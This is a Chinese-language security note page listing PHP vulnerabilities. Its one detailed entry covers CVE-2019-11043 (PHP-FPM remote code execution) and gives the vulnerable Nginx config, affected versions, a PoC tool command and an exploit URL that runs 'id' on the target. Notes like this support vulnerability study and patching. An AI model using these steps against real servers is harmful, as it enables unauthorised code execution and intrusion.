CVE-2016-7411
CVE-2016-7412
CVE-2016-7413
CVE-2016-7414
CVE-2016-7415
CVE-2016-7416
CVE-2016-7417
CVE-2016-7418


CVE-2019-11043




Date:

2019.9.

类型:

远程代码执行

前置条件:


Nginx + fastcgi + php-fpm 


配置文件信息如下:

location ~ [^/]\.php(/|$) {

  ...

  fastcgi_split_path_info ^(.+?\.php)(/.*)$;

  fastcgi_param PATH_INFO       $fastcgi_path_info;

  fastcgi_pass   php:;

  ...

}

影响范围:
version>php 7, php5(EXP暂无)
PHP 7.1版本小于7.1.33;PHP 7.2版本小于7.2.24;PHP 7.3版本小于7.3.11

PoC:
https://github.com/neex/phuip-fpizdam
go run . "http://ip:8080/index.php"


ExP:
http://ip:8080/index.php?a=id


												


											
应用安全 - 编程语言漏洞 - PHP语言漏洞汇总的更多相关文章
	

    
								
  1. PhpStudy2018后门漏洞预警及漏洞复现&检测和执行POC脚本
		
    PhpStudy2018后门漏洞预警及漏洞复现&检测和执行POC脚本 phpstudy介绍 Phpstudy是国内的一款免费的PHP调试环境的程序集成包,其通过集成Apache.PHP.MyS ...
    
		
    2. 
						
  2. DedeCMS flink_add Getshell漏洞 管理员CSRF漏洞
		
    DedeCMS flink_add Getshell漏洞 管理员CSRF漏洞 1.漏洞利用 由于tpl.php中的$action,$content,$filename变量没有初始化,从而能操纵这些变量 ...
    
		
    3. 
						
  3. Go语言语法汇总(转)
		
    Go语言语法汇总 分类: 技术2013-09-16 14:21 3007人阅读 评论(0) 收藏 举报 go语言golang并发语法   目录(?)[+]   最近看了看GoLang,把Go语言的语法 ...
    
		
    4. 
						
  4. Nikto是一款Web安全扫描工具,可以扫描指定主机的web类型,主机名,特定目录,cookie,特定CGI漏洞,XSS漏洞,SQL注入漏洞等,非常强大滴说。。。
		
    Nikto是一款Web安全扫描工具,可以扫描指定主机的web类型,主机名,特定目录,cookie,特定CGI漏洞,XSS漏洞,SQL注入漏洞等,非常强大滴说... root@xi4ojin:~# cd ...
    
		
    5. 
						
  5. 利用窗口引用漏洞和XSS漏洞实现浏览器劫持
		
    ==Ph4nt0m Security Team==                        Issue 0x03, Phile #0x05 of 0x07 |=----------------- ...
    
		
    6. 
						
  6. OpenSSL重大漏洞-Heartbleed之漏洞利用脚本POC讲解
		
    OpenSSL Security Advisory [07 Apr 2014] ======================================== TLS heartbeat read  ...
    
		
    7. 
						
  7. MySQL 0Day漏洞出现 该漏洞可以拿到本地Root权限
		
    2016年9月12日, legalhackers.com网站发布了编号为CVE-2016-6662的0day漏洞公告 .由于该漏洞可以获得MySQL服务器的Root权限,且影响MySql5.5.5.6 ...
    
		
    8. 
						
  8. ref:PHP反序列化漏洞成因及漏洞挖掘技巧与案例
		
    ref:https://www.anquanke.com/post/id/84922 PHP反序列化漏洞成因及漏洞挖掘技巧与案例 一.序列化和反序列化 序列化和反序列化的目的是使得程序间传输对象会更加 ...
    
		
    9. 
						
  9. atitit.面向过程的编程语言异常处理 c语言 asp vbs 的try catch 实现
		
    atitit.面向过程的编程语言异常处理 c语言 asp vbs 的try catch 实现 1. 返回值法.and全局ERROR 变量法 1 2. 抛出异常Err.Raise 1 3. 实现try  ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. FPDF_CHAR_INFO
			
    typedef struct { FX_WCHAR m_Unicode; FX_WCHAR m_Charcode; FX_INT32 m_Flag; FX_FLOAT m_FontSize; FX_F ...
    
			
    2. 
						
  2. JAVA利用递归的方法删除一个文件夹以及文件夹下所有的子文件
			
    public static boolean deleteFolder(String url) { File file = new File(url); if (!file.exists()) { re ...
    
			
    3. 
						
  3. Python之网路编程进程理论基础
			
    背景知识 顾名思义,进程即一个软件正在进行的过程.进程是对正在运行程序的一个抽象. 进程的概念起源于操作系统,是操作系统最核心的概念,也是操作系统提供的最古老的也是最重要的抽象概念之一.操作系统的其他 ...
    
			
    4. 
						
  4. jQuery后续和 前端框架Bootstrap
			
    目录 一.jQuery后续 1. 动画效果 (1)自定义点赞动画实例 2. jQuery的自带方法 (1)each (类似for循环) (2)data() (存放隐形的数据) 二.前端框架之Boots ...
    
			
    5. 
						
  5. leaflet 地图容器大小改变时,地图自适应新容器
			
    window.onload = function () { changeDivHeight(); } //当浏览器窗口大小改变时,设置显示内容的高度 window.onresize = functio ...
    
			
    6. 
						
  6. Leaflet使用vector tiles 标注label设置
			
    JS //简单的标注 var marker = L.marker([ 31.2, 114.5 ], { // icon:myIcon }).addTo(map) // 设置label .bindToo ...
    
			
    7. 
						
  7. BeanPostProcessor和BeanFactoryPostProcessor的区别
			
    官方文档: 在Spring核心的1.8章节 使用BeanPostProcessor自定义Bean BeanPostProcessor 接口定义了您可以实现的回调方法,以提供您自己的(或覆盖容器的默认) ...
    
			
    8. 
						
  8. H5 网站支付宝支付(前端部分)包含微信浏览器中的处理方法。
			
    手机网站唤起支付宝支付: H5 网站实现支付宝支付是一个很常见的需求: 实现方式主要是在后台配置和预支付, 前端需要做的就是唤起 支付宝App 然后就可以输入密码支付. 这个其实难度很低, 主要就是在 ...
    
			
    9. 
						
  9. es入门--curl的使用
			
    文档介绍: 首先要讲什么是文档,我们中大多是java程序员,java是面向对象的,那么在elasticsearch看来:对象和文档是等价的.只不过这个对象是可以被序列化成key-value形式的jso ...
    
			
    10. 
						
  10. 管理es索引-使用 Xput创建索引
			
    curl是利用URL语法在命令行方式下工作的开源文件传输工具,使用curl可以简单实现常见的get/post请求.简单的认为是可以在命令行下面访问url的一个工具.在centos的默认库里面是有cur ...
    
			
    11.